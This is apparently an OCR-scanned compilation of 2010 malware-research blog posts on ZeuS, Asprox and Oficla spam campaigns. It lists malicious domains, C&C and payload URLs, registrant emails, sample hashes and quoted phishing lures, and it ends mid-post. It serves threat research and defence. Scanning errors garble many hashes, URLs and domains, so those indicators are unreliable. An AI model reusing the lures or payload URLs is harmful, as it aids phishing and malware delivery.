Client-side exploits serving domains ( 94.23.231.140; 
91.121.115.208; 94.23.11.38; 94.23.224.221; 
94.23.229.220) part of the campaign: 

applecorn.com - Email: es@qx8.ru 

areadrum.com - Email: qx@freenetbox.ru 

busyspade.com - Email: baffie@freenetbox.ru 

cafemack.com - Email: soy@qx8.ru 

clanday.com - Email: elope@fastermail.ru 

dnsofthost.com - Email: depot@infotorrent.ru 

drunkjeans.com - Email: runway@5mx.ru 

earlymale.com - Email: amply@maillife.ru 

galslime.com - Email: soy@qx8.ru 
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gigasofa.com - Email: grind@fastermail.ru 


hillchart.com - Email: soy@qx8.ru 
hugejar.com - Email: runway@5mx.ru 
ionicclock.com - Email: kin@maillife.ru 
iasteye.com - Email: amply@maillife.ru 
luckysled.com - Email: kin@maillife.ru 
macrotub.com - Email: dodge@5mx.ru 
oldgoal.com - Email: kin@maillife.ru 
outerrush.com - Email: amply@maillife.ru 
quietzero.com - Email: grind@fastermail.ru 
radiomum.com - Email: es@qx8.ru 
roundstorm.com - Email: es@qx8.ru 
sadute.com - Email: grind@fastermail.ru 
sheepbody.com - Email: es@qx8.ru 
shinytower.com - Email: cord@maillife.ru 
spiatspa.com - Email: elope@fastermail.ru 
tanspice.com - Email: dodge@5mx.ru 
tanyear.com - Email: grind@fastermail.ru 
tightsales.com - Email: runway@5mx.ru 
tuneblouse.com - Email: es@qx8.ru 
validplan.com - Email: dodge@5mx.ru 



waxyblock.com - Email: cord@maillife.ru 
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allnext.ru - Email: swipe@maillife.ru 
barnsoftware.ru - Email: people@bigmailbox. 
bestbidline.ru - Email: jody@fastermaii.ru 
bestexportsite.ru - Email: orphan@qx8.ru 
bittag.ru - Email: tips@freenetbox.ru 
boozelight.ru - Email: ole@bigmailbox.ru 
brandnewnet.ru - Email: orphan@qx8.ru 
cangethelp.ru - Email: liver@freenetbox.ru 
chainjoke.ru - Email: ole@bigmailbox.ru 
comingbig.ru - Email: swipe@maillife.ru 
countypath.ru - Email: liver@freenetbox.ru 
crystalrobe.ru - Email: people@bigmailbox.ru 
cupjack.ru - Email: tips@freenetbox.ru 
dealyak.ru - Email: people@bigmailbox.ru 
eyesong.ru - Email: tips@freenetbox.ru 
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familywater.ru - Email: ole@bigmailbox.ru 


funsitedesigns.ru - Email: orphan@qx8.ru 
gaineed.ru - Email: people@bigmailbox.ru 
girllab.ru - Email: tips@freenetbox.ru 
greedford.ru - Email: ole@bigmailbox.ru 
guntap.ru - Email: tips@freenetbox.ru 
heroguy.ru - Email: ole@bigmailbox.ru 
homecarenation.ru - Email: orphan@qx8.ru 
homesitecam.ru - Email: orphan@qx8.ru 
hookdown.ru - Email: crag@mailiife.ru 
horsedoctor.ru - Email: ole@bigmailbox.ru 
jarpub.ru - Email: ole@bigmailbox.ru 
liplead.ru - Email: ole@bigmailbox.ru 
iivesitedesign.ru - Email: orphan@qx8.ru 
mansbestsite.ru - Email: orphan@qx8.ru 
marketholiday.ru - Email: people@bigmailbox.ru 
metaispice.ru - Email: ole@bigmailbox.ru 
mingleas.ru - Email: crag@maillife.ru 
motherfire.ru - Email: people@bigmailbox.ru 
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musicbestway.ru - Email: jody@fastermail.ru 
musicsiteguide.ru - Email: crag@maillife.ru 
netbestheip.ru - Email: liver@freenetbox.ru 
netwebinternet.ru - Email: dibs@freemaiibox.ru 
newagedirect.ru - Email: orphan@qx8.ru 
newhomelady.ru - Email: orphan@qx8.ru 
newinfoworid.ru - Email: orphan@qx8.ru 
newworldunion.ru - Email: orphan@qx8.ru 
ourfreesite.ru - Email: orphan@qx8.ru 
panlip.ru - Email: tips@freenetbox.ru 
pantscow.ru - Email: ole@bigmailbox.ru 
problemdollars.ru - Email: people@bigmailbox.ru 
raceobject.ru - Email: people@bigmailbox.ru 
silencepill.ru - Email: ole@bigmailbox.ru 
sisterqueen.ru - Email: ole@bigmailbox.ru 
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slaveday.ru - Email: ole@bigmailbox.ru 
stareastwork.ru - Email: next@fastermail.ru 
superblenderworld.ru - Email: crag@maillife.ru 
superhoppie.ru - Email: soft@bigmailbox.ru 



supertruelife.ru - Email: edsel@fastermail.ru 
superwestcoast.ru - Email: crag@maillife.ru 
theantimatrix.ru - Email: ole@bigmailbox.ru 
tintie.ru - Email: swipe@maillife.ru 
topmediasite.ru - Email: tips@freenetbox.ru 
treecorn.ru - Email: tips@freenetbox.ru 
trueblueally.ru - Email: soft@bigmailbox.ru 
trueblueberyl.ru - Email: soft@bigmailbox.ru 
tunemug.ru - Email: tips@freenetbox.ru 
ushead.ru - Email: crag@maillife.ru 
westbendonline.ru - Email: edsel@fastermail. 
yaktrack.ru - Email: ole@bigmailbox.ru 
yournewonline.ru - Email: orphan@qx8.ru 
yourtolltag.ru - Email: orphan@qx8.ru 
yourtruecrime.ru - Email: soft@bigmailbox.ru 
zooneed.ru - Email: ole@bigmailbox.ru 
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Name servers of notice: 

nsl.dnsofthost.com - 81.2.210.98 


ns2.dnsofthost.com -194.79.88.121 


ns3.dnsofthost.com - 67.223.233.101 

ns4.dnsofthost.com - 85.214.29.9 

The NAUNET-REG-RIPN domain registrar , although, having 
already registered over a [1] 100 ZeuS crime ware 

friendly domains, there's little chance they'll take action. 
Updates, including take down/remediation actions will be 
posted as soon as they emerge. 

This post has been reproduced from [2]Dancho 
Danchev's blog. Follow him [3Jon Twitter. 

1. httos://zeustracker. abuse, ch/monitor. oho? 
re aistrar=NAUNET-REG-RIPN 

2. htto://ddanchev.blo as oot. com/ 

3. http://twitter.com/danchodanchev 
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Dissecting the Xerox WorkCentre Pro Scanned 
Document Themed Campaign (2010-07-19 20:26) 

Over the weekend, a " Scan from a Xerox WorkCentre Pro" 
themed malware campaign relying on zip archives, was 
actively spamvertised by cybecriminals seeking to infect 
gullible end/corporate users. 

What's particularly interesting about this campaign, is the 
cocktail of malware dropped on infected hosts, in- 







eluding Asprox sample ([1] Money Mule Recruiters use 
ASProx's Fast Fluxing Services ), and two separate 
samples of Antimalware Doctor. 

- Sample subject: Scan from a Xerox WorkCentre Pro 
$9721130 

- Sample message: " Please open the attached document. 
It was scanned and sent to you using a Xerox WorkCentre 
Pro. 

Sent by: Guest 
Number of Images: 1 
Attachment File Type: ZIP [DOC] 

WorkCentre Pro Location: machine location not set Device 
Name: XRX2090AA7ACDB45466972. For more in¬ 
formation on Xerox products and solutions, please visit 
http://www.xemx. com" 

- Detection rates: 

- [ 2 JXerox_docl.exe - Trojan. Win32.Jorik.Oficla.bb - 
Result: 34/42 (80.96 %) 

File size: 30926 bytes 

MD5...: 1 d378a6bc94d5b5a 702026d31 c21 e242 

SHA1..: 545e83f547d05664cd6792e254b87539fba24eb9 

- [3 JXerox_doc2.exe - Trojan. Win32.Jorik.Oficla.ba - 
Result: 34/42 (80.96 %) 


File size: 43520 bytes 



MD5...: 829c86d4962fl 86109534b669ade4 7d7 
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5HA1..: 5d3d02d0f6ce87cd96a34b73dc395460d623616e 

The samples then phone back to the Oficla/Sasfis C &Cs at 

hulejsoops.ru/images/bb.php?v=200 &id=554905388 

&b=avpsales &tm=3 - 91.216.215.66, A551274 - Email: 
mxx3@yandex.ru which periodically rotates three different 
executables using the following URLs: 

0815.ch /pic/view.exe 

curseri. ch /pictures/securedupda ter fix 717. exe 
regionalprodukte-beo. ch /about/cgi. exe 

Backup URLS: 

leeitpobbod.ru/image/bb.php - 59.53.91.195, AS4134 - 
Email: mxx3@yandex.ru - dead response 

ioioohuiidifsd.ru/image/bb.php - 68.168.222.158 - 
Email: mxx3@yandex.ru - dead response 

nemohuildifsd.ru/image/bb.php - 59.53.91.195 
(nemoh uildiin. ru, 

russianmomds. ru), 

AS4134 - Email: 

mxx3@yandex.ru - dead response 

Let's take a peek at the samples found within the C &C. 


[4jview.exe - Trojan. Win32.Jorik.Aspxor.e - Result: 11/42 
(26.2 %) 

File size: 79360 bytes 

MD5...: 5d296fel ef7bf67f36fe9adb209398ee 

SHA1..: 41 b45bcd241 cd97b72d7866dl3c4aOeb6bf6aOee 
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Upon execution, the sample phones back to well known 
Asprox C &Cs: 

[5] cl63amgstart. ru: 80/board.php 

- 91.213.217.4, A542473 - Email: ssal@yandex.ru 

[6] hypervmsys.ru: 80/board.php - 89.149.223.232 
(hostagents.ru), A528753 - Email: 

vadim.rinatovich@yandex.ru 580 
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Previously, all of the following ASPRox domains used 
exclusively for massive SQL injections, used to respond to 

91 . 213 . 217 . 4 : 

webservicesbba.ru - Email: anrnews@mail.ru 
webservicelupa.ru - Email: anrnews@mail.ru 
webserivcekota.ru - Email: anrnews@mail.ru 
webservicesrob.ru - Email: anrnews@mail.ru 


webserivcezub.ru - Email: anrnews@mail.ru 
webserviceforward.ru - Email: anrnews@mail.ru 
webserivcessh.ru - Email: anrnews@mail.ru 
webservicesmulti.ru - Email: anrnews@mail.ru 
webservicezok.ru - Email: anrnews@mail.ru 
webservicebal.ru - Email: anrnews@mail.ru 
webservicefull.ru - Email: anrnews@mail.ru 
webservicessl.ru - Email: anrnews@mail.ru 
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webserviceaan.ru - Email: anrnews@mail.ru 
webservicedevlop.ru - Email: anrnews@mail.ru 
webserviceftp.ru - Email: anrnews@mail.ru 
hypervmsys.ru - Email: anrnews@mail.ru 
webserviceget.ru - Email: anrnews@mail.ru 
webserviceskot.ru - Email: anrnews@mail.ru 
cl63amgstart.ru - Email: ssal@yandex.ru 
ml63amgstart.ru - Email: ssa21@yandex.ru 
webservicesttt.ru - Email: anrnews@mail.ru 
webservicenow.ru - Email: anrnews@mail.ru 
webservicekuz.ru - Email: anrnews@mail.ru 



Currently, the gang's migrating this infrastructure to 
109.196.134.58, A539150, VLTELECOM-AS VLineTelecom 

LLC Moscow, Russia . 

Ail of these domains+subdomains sharing the same js.js 
directory structure, which upon visiting loads URLs such as 

(accesspad.ru :8080/index.php?pid=6) with the rest of 
the domains sharing the same in frastructure as the ones 
profiled in "[7]Spamvertised Amazon "Verify Your 
Email", "Your Amazon Order" Malicious Emails " post: 
access, webservicebal.ru 

admin, webserivcekota.ru 

a pi. webserivcessh.ru 

app. webserviceforward.ru 

app. webservicesrob.ru 

base, webserviceftp.ru 

batch, webserviceaan.ru 

batch, webservicebal.ru 

bios, webservicesbba.ru 

block, webserviceaan.ru 

block, webservicesrob.ru 

cache, webservicesbba.ru 

cache, webservicesmulti.ru 


chk. webservicezok.ru 



cmdid. webserivcezub.ru 
code, webservicesbba.ru 
com. webserivcekota.ru 
com. webservicedevlop.ru 
ddk. webservicesrob.ru 
default, webservicezok.ru 
diag. webserviceftp.ru 
direct, webserviceftp.ru 
dll. webservicelupa.ru 
drv. webservicebal.ru 
drv. webservicesrob.ru 
encode, webservicefull.ru 
err. webserivcessh.ru 
export, webservicedevlop.ru 
ext. webserviceaan.ru 
ext. webservicesbba.ru 
file, webserivcekota.ru 
582 

file, webserivcessh.ru 


filter, webservicedevlop.ru 
font, webservicelupa.ru 
gdi. webserviceftp.ru 
get. webservicesbba.ru 
go. webserivcekota.ru 
go. webservicefull.ru 
guid. webserivcezub.ru 
hostid. webservicesbba.ru 
hostid. webservicesmuiti.ru 
http, webserviceforward.ru 
icmp. webservicesbba.ru 
id. webserivcezub.ru 
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inf. webserviceaan.ru 
info, webservicedevlop.ru 
ini. webservicesrob.ru 
ioctl. webservicedevlop.ru 
kernel, webservicezok.ru 
Ian. webservicefull.ru 
Ian. webservicesbba.ru 



lib. webservicebal.ru 


lib. webserviceftp.ru 
I ibid, webserviceiupa.ru 
load, webservicebal.ru 
locate, webservicelupa.ru 
log. webservicelupa.ru 
log. webservicezok.ru 
log-in. webservicessl.ru 
manage, webservicesbba.ru 
map. webserivcezub.ru 
map. webservicedevlop.ru 
media, webserviceftp.ru 
mode, webservicelupa.ru 
net. webservicebal.ru 
n eta pi. webserviceaan.ru 
netmsg. webserivcezub.ru 
nsl. webservicelupa. ru 
ns2. webservicelupa.ru 
ntdll. webservicessl.ru 
ntio. webservicelupa.ru 



ntio. webservicezok.ru 


obj. webservicesbba.ru 
object, webserivcessh.ru 
object, webservicesmuiti.ru 
oem. webservicebal.ru 
offset, webservicefull.ru 
ole. webservicesbba.ru 
org. webservicesrob.ru 
page, webserviceaan.ru 
parse, webservicebal.ru 
peer, webserviceaan.ru 
pic. webservicesbba.ru 
pool, webservicelupa.ru 
port, webservicebal.ru 
port, webservicesbba.ru 
port, webservicessl.ru 
proc. webserviceaan.ru 
proc. webservicessl.ru 
rdir. webserviceftp.ru 
redir. webservicedevlop.ru 



refer, webserivcezub.ru 
reg. webserviceaan.ru 
remote, webservicessl.ru 
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run. webserivcekota.ru 
script, webserivcezub.ru 
sdk. webserivcezub.ru 
search, webserviceaan.ru 
search, webservicedevlop.ru 
setup, webserivcezub.ru 
setup, webservicezok.ru 
snmp. webserviceforward.ru 
snmp. webservicesrob.ru 
sslcom. webserivcessh.ru 
sslcom. webservicesrob.ru 
sslid. webserivcekota.ru 
sslnet. webservicedevlop.ru 
s vc. webservicede vlop. ru 
tag. webservicebal.ru 
tag. webservicessl.ru 



tid. webserviceftp.ru 
time, webservicelupa.ru 
udp. webserviceftp.ru 
udp. webservicezok.ru 
update, webserviceftp.ru 
update, webservicefull.ru 
url. webservicesbba.ru 
url. webservicezok.ru 
vba. webservicesrob.ru 
vbs. webservicelupa.ru 
ver. webserivcekota.ru 
webserivcekota. ru 
webserivcessh. ru 
webseri vcezub. ru 
webserviceaan. ru 
webservicebal. ru 
webservicede vlop. ru 
webserviceforward. ru 
webserviceftp. ru 


webservicefull. ru 



webserviceget. ru 
webservicelupa. ru 
webservicesmulti. ru 
webservicesrob. ru 
webservicessl. ru 
webservicezok. ru 
win. webservicezok.ru 
xml. webservicefull.ru 
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Getting back to the samples rotated by the original 
campaign binary, and their detection rates, network 
interactions. 

- Detection rates: 

- [8Jsecuredupdaterfix717.exe - Trojan. Win32.FakeYak - 
Result: 22/42 (52.39 %) 

File size: 36864 bytes 

MD5...: cdl 6d4c998537248e6d4d0a3d51 ca6de 
SHA1..: 7e36ef0ce85facl 8ecffd5a82566352ce0322589 
Phones back to: 

s.ldwn.in/inst.php?fff=7071710000 &saf=ru - 
91.188.60.236 (updget.in; wordmeat.in), [9JAS6851 - 


Email: feliciachappell@ymail. com 

bootfree.in/ MainModule717releasel0000.exe - 
194.8.250.207 (flowload.in; iessown.in; sstats.in), 

A543134 - 

Email: feliciachappell@ymail. com 

s. wordmeat. in/in stall. php?coid= -91.188.60.236, 
[10JAS6851 - Email: feliciachappell@ymail.com 
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- Detection rate for MainModuie717reieasel0000.exe 

- [11 ]MainModule 717re I easel0000. exe - 

Trojan:Win32/FakeYak - Result: 26/42 (61.90 %) 

File size: 1043968 bytes 

MD5...: 3c30c62e9981 bd86c589744 7cb358235 

SHA1...: 36bfc285a61 bcb67f2867dd303ac3cefa0e490a0 

Phones back to: 

wordmeat.in - 91.188.60.236 - Email: 
feliciachappell@ymail. com 

vismake.in - 91.188.60.236 - Email: 
keelingelizabeth@ymail. com 

- Detection rate for the 3rd binary rotated in the original C 
&C: 


- [12jcgi.exe - Trojan.Inject. 8960 - Result: 6/42 (14.29 
%)File size: 62976 bytes 

MD5...: 45c062490e0fc262cl 81 efc323cb83ba 

5HA1..: bff90630f2064d7bcc82b7389c2b8525ff960870 

Phones back to: 

musiceng.ru/music/forum/indexl.php - 91.212.127.40, 
A549087 - Email: oifeodosoff@yandex.ru 

The whole campaign, is a great example of what cybercrime 
underground multitasking is all about. Moreover, 

it illustrates the interactions between the usual suspects, 
with the not so surprising appearance of the already 

profiled [13]AS6851, BKCNET, Sagade Ltd. 

This post has been reproduced from [14]Dancho 
Danchev's blog. Follow him [15]on Twitter. 

1. htto://ddanchev.blo as oot.com/2008/07/monev-mule- 
recruiters-use-asproxs-fast.html 
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2 . 

http.V/www. virustotal.com/analisis/a77ed99ab4c50782c33e 

84 fl ecddSl 1 d5el b4b943669a942bef3d5bd99e426 73 - 

12795 

59650 


3 . 











htto://www. virustotal. com/analisis/O 78c437295f0248d36c45 

2297a23939f6cba73e8a89faada9fc2b6f97alf0bd8-12795 

59651 

4. 

http://www. virustotal. com/analisis/88130889be 1 fc3ab01 ed7 

bl 54b99cf7dd4 7fbbcef30e51 de 7 a 9d92ba5c8d50b6-12 795 

60134 

5. htto://www. m86securitv. com/labs/i/The-Asprox-Spambot- 
Resurrects . trace. 1345 % 7E. as p 

6. http.V/www.m86securitv. com/labs/i/Another-round-of- 
Asprox-SOL-iniection-attacks . trace. 1366% 7E. as p 

7. http.V/ddanchev.blo as pot. com/2010/07/spamvertised- 
amazon-verif v- vou-email.html 

8 . 

http.V/www. virustotal. com/analisis/63d9da362e466e962c7a 

bc9f8b3d643dafle!8f84170cd22bfbd4a595877b 18b12 795 

60218 

9. http.V/ddanchev.blo as pot. com/2010/07/samplin a- 
malicious-activitv-inside.html 

10. http://ddanchev. blo as pot. com/2010/07/samplin a- 
malicious-activitv-inside. html 

11 . 

http://www. virustotal. com/analisis/bb82340898097338cc4d 

dff6b8c0283fc416fae4e2726390a 65fc65ccde 7dc76-l2795 
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12 . 

htto: //www. virustotal. com/analisis/1 Cf85f064d3e042alce0f7 

726d818e3145f6c5dec893a8e 780 7cdb2361667caf-l2 795 

60723 

13. htto.V/ddanchev. blo as oot. com/2010/07/exoloits- 
malware-and-scareware-courtesv.html 

14. http://ddanchev. blo as oot. com/ 

15. http://twitter, com/danchodanchev 
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ZeuS Crimeware Serving 123Creetings Ecard Themed 
Campaign in the Wild (2010-07-20 23:40) 

Ubiquitous social engineering schemes, never fade away. 
ZeuS crimeware campaigners are currently using a 

123greetings.com ecard-themed campaign, in an attempt 
to entice users to " enjoy their ecard". 

Subject: " You have received an Greeting eCard" 

Message: " Good day. You have received an eCard 

To pick up your eCard, choose from any of the following 
options: Click on the following link (or copy & paste it into 
your web browser): matt-ievine.com 7ecard.exe; 
secondary URL offered: forestarabians.nl/ecard.exe 

Your card will be aviailable for pick-up beginning for the 














next 30 days. Please be sure to view your eCard before the 
days are up! 

We hope you enjoy you eCard. Thank You! " 

Detection rate: 

- [ljecard.exe - Cryp _Zbot-12; Trojan/Win32.Vundo - 
Result: 9/42 (21.43 %) 

File size: 147968 bytes 

MD5...: e6f3aa226bf9733b7e8c07cab339f4dc 

SHA1..: e983767931900al3b88a615d6cld3f6ff8fb6b60 

Upon execution, the sample phones back to: 

[2 Jzephehooqu. ru /bin/koethood.bin - 77.78.240.115, 
AS42560 - Email: skit@5mx.ru 

[3 Jjocudaidie.ru 79xq/ gate.php -118.169.173.218, 
AS3462 - Email: skit@5mx.ru - FAST-FLUXED 

Multiple MD5s are also currently active at zephehooqu.ru. 

Detection rates: 

[4Jaimeenei.exe - Win32/Zbot.CJI - Result: 30/42 (71.43 %) 
File size: 149504 bytes 

MD5...: 096b7e8c4f611 f0eb69cfb776f3a0e7e 

SHA1..: 909d7c2740f84599d5e30ffed7261 el9ad4a962a 

[5Jcahdoigu.exe - Mal/Zbot-U - Result: 27/42 (64.29 %) 



File size: 147968 bytes 

MD5...: Ilf9f96cl 7584a672c2a563744130a46 
SHA1..: f31 c40c5c766c7628023105be6f004e5322bl 7b6 
[6fkoethood.exe - Troj/Zbot-SW - Result: 30/42 (71.43 %) 
File size: 147968 bytes 

MD5...: da1979227141844be69577f7f31 a7309 

SHA1..: 5ada2c390e63ca051 c9582fe723384ce52a45912 

[7Jloobuhai.exe - BKDR QAKBOT.SMB - Result: 33/42 
(78.58 %) 

File size: 147968 bytes 

MD5...: df4el 9af8c356b3ff810bc52f6081 ccc 

SHA1..: d4ald2fl47ae0d24a3eaac66e8d2f9de50cf7a0c 

589 

K 

[8Joovaenai.exe - Packed. Win32.Katusha.j - Result: 32/42 
(76.2 %) 

File size: 147456 bytes 

MD5...: f0fd5579f06d5b581 b5641546ae91 d52 

SHA1..: c81 fa66c546020f3clc34a0dlaal91 b2d9578fO7 

[9fquohthei.exe - Win32/Spy.Zbot.YW - Result: 33/42 
(78.58 %) 


File size: 147968 bytes 

MD5...: ffc0d66024f690e875638f4c33ba86fl 

SHA1..: C958f3426a3e6fedd76b86a5aefl 6c90915ac539 

[10jsofeigoo.exe - Win32/Spy.Zbot.YW - Result: 31/42 
(73.81 %) 

File size: 148992 bytes 

MD5...: 45e98426fafd221 ffb7d55ce8alae531 

SHA1..: 8235b3a80ba6611779dfd4db40a48627af7374eb 

[lljteemaeko.exe - PWS:Win32/Zbot.gen!Y - Result: 32/42 
(76.2 %) 

File size: 148992 bytes 

MD5...: 9758f04d2flbd664f37c4285a013372a 

SHA1..: 4273dc48f9aeaf69cb7047c4a882af744 79fb635 

[12Jthaigogo.exe - Win32/Spy.Zbot.YW - Result: 34/42 
(80.96 %) 

File size: 147968 bytes 

MD5...: b667d75f5bb9f23a8ae249f7de4000a5 

SHA1..: 7b57783dcf2a eaafba b3407bb608469851 d342bb 

[13Jziejaing.exe - Trojan.Zbot. 610 - Result: 30/42 (71.43 
%) 


File size: 147456 bytes 



MD5...: 7592e957de01e53956517097c0e9ccd8 

SHA1..: e7c04d2c8c5d4a51 e2615a2ee015d87d28655320 

Related .ru cybercrime-friendly domains, sharing fast-flux 
infrastructure with this campaign's C &C: 

adaichaepo.ru - Email: subtle@maillife.ru 

aroolohnet.ru - Email: brawn@bigmaiibox.ru 

dahzunaeye.ru - Email: celia@freenetbox.ru 

esvr3.ru - Email: bender@freenetbox.ru 

hazeipay.ru - Email: owed@bigmailbox.ru 

iesahnaepi.ru - Email: heel@bigmailbox.ru 

iveeteepew.ru - Email: atomic@freenetbox.ru 

jocudaidie.ru - Email: skit@5mx.ru 

ohphahfech.ru - Email: warts@maillife.ru 

raiiuhocal.ru - Email: celia@freenetbox.ru 

sdlls.ru - Email: vc@bigmaiibox.ru 

Name servers of notice within the fast-flux infrastructure: 

nsl.tophitnews.net - 74.122.197.22 - Email: 
worldchenell@ymail. com 

ns2.tophitnews.net -173.19.142.57 
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nsl.usercool.net - 74.122.197.22 



ns2.usercool.net - 76.22.74.15 


nsl.welcominternet.net - 74.54.82.223 - Email: 
admin@rangermadeira. com 

ns2.welcominternet.net - 74.54.82.223 

nsl.gamezoneiand.com -188.40.204.158 - Email: 
xtraii. corp@gmail. com 

ns2.gamezoneland.com -174.224.63.18 

nsl.tropic-noik.com -188.40.204.158 - Email: 
greysy@gmx. com 

ns2.tropic-nolk.com -171.103.51.158 

nsl.interaktivitysearch.net - 202.60.74.39 - Email: 
ssupercats@yahoo. com 

ns2.interaktivitysearch.net - 202.60.74.39 

nsl.openworldwhite.net - 202.60.74.39 - Email: 
xtraii. corp@gmaii. com 

ns2.openworldwhite.net - 43.125.79.23 

nsl.heiphotbest.net - Email: worldchenell@ymail.com 

it gets even more interesting. 

[14]greysy@gmx.com has already been profiled in an 
Avalanche botnet campaign using [15]TROYAK-AS's 
services back then ([16] The Avalanche Botnet and the 
TROYAK-AS Connection ), followed by another 
assessment 



"[17]TorrentReactor.net Serving Crimeware, Client- 
Side Exploits Through a Malicious Ad" where the same 
email was also used to register a name server part of the 
fast-flux infrastructure of the ZeuS crimeware's C &Cs. 

This post has been reproduced from [18]Dancho 
Danchev's blog. Follow him [19]on Twitter. 

1 . 

htto://www. virustotai. com/analisis/6fa6220a2ede4f8b70002 

5d7e3c566d5fac0ce0309bb99a3d62c2348fc4b211d-12796 

34229 

2. httDs://zeustrackerabuse, ch/monitor. oho? 
host=zeDhehooau. ru 

3. httos://zeustracker. abuse . ch/monitor. oho ? 
host=iocudaidie. ru 

4. 

htto: 7/www. virustotai. com/analisis/O 7 7ad77f7 7e4e2987633a 

Oc 78f8a54e664e9ecaacfa3 7128c0631326182c 5 7 If-12 796 

35278 

5. 

htto://www. virustotai. com/a nalisis/652eeb 7dfbb26f203e9a4 

6481604ea4e44clbl2793313b232bce45a6a41f2e78-12796 

35282 


6 . 


















htto://www. virustotal.com/analisis/7537dcl 04a87606ad7c9 

7 a 61 c0e2df51 ab718ed0589 75039fa 691 f9dac528b9c-12 796 


35287 

7. 

htto://www. virustotal.com/analisis/4cad09c241308174a674c 

2a48ef25bf062b9344e55b2742a8b2ef3dba2ela4cd-12796 

35293 

8 . 

htto://www. virustotal. com/analisis/54e80ed3761 e03e61850 

2d6al 67221 b!4f62c26762a63c99514186fc7f499f81 -12 796 

35298 

9. 

htto://www. virustotal.com/analisis/d78516adb99d08970ba6 

7d5396f0alQ27dc6f0eeddlc0eae0412404b076e5234- 

12796 

35315 

10 . 

htto://www. virustotal.com/analisis/09df053716f8a262332d3 

61eb590cad8f350ec58a60b3cffd33e76c8bc647a3b-12796 

35326 

11 . 

htto://www. virustotal.com/analisis/cfal 60f6f4d763daf400c0 

3d 1 b994bccca2d26c8c4c8ea5 717113d935fe59382-12796 

35329 





















12 . 

htto://www. virustotal. com/analisis/5f732cf733a052d2bba3a 

360e7a7994bb3ccdd76aa036b5f6777ab78164d0037-12 796 

35336 

13. 

h tto.V/www. virustotal. com/analisis/Oda 6ba3b 7154f9fbbbcb4 

ea0771c63262a5e4e0a15c69de7d9706ece7621b289- 

12796 

35343 

14. htto.V/ddanche v. b lo g s oot, com/2010/02/irsohotoarchive- 
themed-zeusclient-side.html 

15. httoV/www.zdnet.com/bloa/securitv/trovak-as-the- 
c vbercrime-friendlv-isD-tha t-iust- wont-ao-a wa v/5761 

16. htto.V/ddanche v. b lo g s oot, com/2010/05/a valanche- 
botnet-and-trovak-as.html 
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17. 

htto.V/ddanche v. blo as oot. com/2010/05/torrentreactornet- 
servina-crimeware.html 

18. htto.V/ddanchev. blo as oot. com/ 

19. htto://twitter, com/danchodanche i/ 
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Summarizing Zero Day's Posts for July (2010-08-02 
14:54) 

The following is a brief summary of all of my posts at 

[lJZDNet's Zero Day for July, 2010. You [2 Jean also go 

through 

[3] previous summaries, as well as subscribe to my 

[4] personal RSS feed, [5]Zero Day's main feed, or 

follow me on Twitter: 

Recommended reading: 

• [6] Does Microsoft's sharing of source code with China and 
Russia pose a security risk? 

• [7]Middle East countries: the BiackBerry is a national 
security threat 

• [8]Report: Apple had the most vulnerabilities throughout 
2005-2010 

01. [9]image Gallery: June's cyber threat landscape 

02. [lOJThe Pirate Bay hacked through multiple SQL 
injections 

03. [llJDoes Microsoft's sharing of source code with China 
and Russia pose a security risk? 


04. [12]Report: Apple had the most vulnerabilities 
throughout 2005-2010 

05. [13]Malware Watch: Malicious Amazon themed emails 
in the wild 

06. [14JR5A: Banking trojan uses social network as 
command and control server 

07. [15]Middle East countries: the BiackBerry is a national 
security threat 

08. [16]image Gallery: Avast! Antivirus office in Prague, 
Czech Republic 

09. [17]lmage Gallery: Introduction to Avast! Antivirus 
version 5.1 

10. [18]lmage Gallery: The (European) Antivirus market - 
current trends 

11. [19]Google tops comparative review of malicious search 
results 

This post has been reproduced from [20]Dancho 
Danchev's blog. Follow him [21]on Twitter. 

1. httD://bloas.zdnet. com/securit v 

2. htto://ddanchev.bio as oot. com/2010/07/summarizin a- 
zero-da vs- oosts-for-iune. html 

3. htto://ddanchev.bio as oot.com/2010/05/summarizin a¬ 
ze ro-d a vs- oosts-for-ma v. html 

4. http://www.zdnet.com/toDics/dancho-hdanchev? 
o=l&mode=rss&taa=mantle skin:content 



















5. http-.//feeds, feedburner. com/zdnet/securit v 


6. httD://www.zdnet.com/bloa/securitv/does-microsofts- 
sharina-of-source~code-with~china-and-russia~Dose-a-se 

curitv-risk/6789 

7. httD://www.zdnet.com/bloa/securitv/nniddle-east- 
countries-the-blackberrv-is-a-national-securitv-threat/6942 

8. httD://www.zdnet.com/bloa/securitv/reDort-a o Dle-had-the- 
most-vulnerabilities-throuahout-2005-2010/6801 

9. httD://www.zdnet.com/Dhotos/ima ae- aaller v- iunes-cvber- 
threat-landscaoe/441675 

10. htto://www.zdnet. com/bloa/securitv/the-oirate-ba v- 
hacked-throuah-multiole-sol-iniections/6776 

11 . 

httD://www.zdnet.com/bloa/securitv/does-microsofts- 

sharina-of-source-code-with-china-and-russia-Dose-a- 

securitv-risk/6789 

12. htto://www.zdnet.com/bloa/securitv/reDort-a o Dle-had- 
the-most-vulnerabilities-throuahout-2005-2010/6801 

13. htto://www.zdnet. com/bloa/securitv/malware-watch- 
malicious-amazon-themed-emails-in-the-wild/6863 

14. httD://www.zdnet.com/bloa/securitv/rsa-bankina-tro ian- 
uses-social-network-as-command-and-control-server/6 
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15. htto://www.zdnet.com/bloa/securitv/middle-east- 
countries-the-blackberrv-is-a-national-securitv-threat/694 

2 

16. http://www.zdnet, com/ohotos/ima ae- aallerv-avast- 
antivirus-office-in-Draaue-czech-reoublic/450633 

17. http://www.zdnet.conn/Dhotos/ima ae- aaller v- 
in troduction-to-a vast-antivirus- version-51/450981 

18. httD://www.zdnet.com/ohotos/ima ae- aallerv-the- 
eurooean-antivirus-market-current-trends/451006 

19. http://www.zd net.com/bloa/securit v/aoo ale-toos- 
comoarative-review-of-malicious-search-results/7009 

20. htto.V/ddanchev. blo as oot. com/ 

21. htto://twitter, com/danchodanchev 
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Spamvertised Best Buy, Macy's, Evite and Target 
Themed Scareware/Exploits Serving Campaign 

(2010-08-09 14:19) 

They are back again ([IJSpamvertised Amazon "Verify 
Your Email", "Your Amazon Order" Malicious Emails; 

[2]Dissecting the Xerox WorkCentre Pro Scanned 
Document Themed Campaign ) for a fresh start of the 
week, 

































with a currently ongoing spam campaign, serving scareware 
and client-side exploits, using a " Thank you for your 
payment"/" Thank you for your EXPRESS payment" themed 
subjects impersonating popular brands such as Best Buy, 
Macy's, Target and Evite. 

Let's dissect the campaign, its structure, emphasize on the 
monetization strategy, and expose the complete 

portfolio of the domains involved in the campaign. 

Sample email: 

" Subject :Thank you for your payment Don't miss a thing - 
Add support@e. macys.com to your email address book! 

Click here if you are unable to see images in this email. 

1. Sign in on macys.com at 
https://www. macys. com/myinfo/index. ognc 

